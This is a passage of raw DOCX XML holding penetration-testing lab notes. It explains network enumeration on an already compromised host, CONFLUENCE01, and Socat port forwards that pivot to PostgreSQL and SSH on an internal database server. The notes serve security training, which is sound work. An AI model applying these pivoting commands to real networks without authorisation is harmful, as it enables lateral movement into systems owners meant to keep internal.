                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5456954" cy="3882833"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output shows us that CONFLUENCE01 has </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">two network interfaces</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: ens192 and ens224. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ens192</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the IP address</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.50.63</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (underlined in blue). inet means IPv4. inet6 is IPv6. So this is the IPv4 address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ens224</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the IP address </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.63</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (underlined in blue)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are curious, the IP addresses to the right of the above IP addresses (also in red), are the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">broadcast addresses</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.255</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.4.50.255 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are broadcast addresses. It’s a special IP address used to send a message to all devices on the same subnet. If you send a packet to 192.168.50.255, every device on the 192.168.50.0/24 subnet will receive i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1473"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now verify the current routing table using the ip route command to understand how traffic is being directed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1765300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="129" name="image118.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image118.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId175"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This machine is dual-homed, with two network interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ens192</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (name of a network interface) on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.0/24 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subnet, with gateway 192.168.50.254 (default route)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ens224 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(name of a network interface) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> subnet, with optional gateway 10.4.50.254</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007DD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lzau8ewq6hm" w:id="69"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Socat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that enumeration is done, we want to connect from our Kali to the psql service on PGDATABASE01 on port 5432. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will do this by pivoting from CONFLUENCE01 to PGDATABASE01, since we already have CONFLUENCE01 compromised</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2400300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="402" name="image387.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image387.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId176"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2400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t xml:space="preserve">We want to open TCP port 2345 on the WAN interface of CONFLUENCE01, then connect to that port from our Kali machine. We want all the packets that we send to this port to be forwarded by CONFLUENCE01 to TCP port 5432 on PGDATABASE01. Once we set up our port forward, connecting to TCP port 2345 on CONFLUENCE01 will be exactly like connecting directly to TCP port 5432 on PGDATABASE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this scenario, we find it already installed, but Socat does not tend to be installed by default on *NIX systems. If not already installed, it's possible to download and run a statically linked binary version instead.</w:t>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t xml:space="preserve">On CONFLUENCE01, we'll start a verbose (-ddd) Socat process. It will listen on TCP port 2345 (TCP-LISTEN:2345), fork into a new subprocess when it receives a connection (fork) instead of dying after a single connection, then forward all traffic it receives to TCP port 5432 on PGDATABASE01 (TCP:10.4.50.215:5432). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this command on CONFLUENCE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007E6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2552700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="341" name="image329.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image329.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId177"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the listening port on CONFLUENCE01 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="360"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll listen on port 2345 since it is outside the privileged port range (0-1024), meaning elevated privileges are not required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007EA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007EB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With the Socat process running, we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our Kali machine, specifying that we want to connect to CONFLUENCE01 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-h 192.168.50.63</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) on port 2345 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p 2345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user account (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-U postgres</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). This will then get forwarded to PGDATABASE01!</w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yvwchxwoxy2b" w:id="70"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Starting a new socat port forward</w:t>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t xml:space="preserve">Now, we decide we want to connect to ANOTHER port on PGDATABASE01. More specifically port 22 for SSH. </w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we need to kill the original Socat process listening on TCP port 2345. We'll then create a new port forward with Socat that will listen on TCP port 2222 and forward to TCP port 22 on PGDATABASE01. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this command on CONFLUENCE01</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1016000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="18" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId178"/>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7F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="884"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="884"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2222 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the port listening on CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="884"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.215:22 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
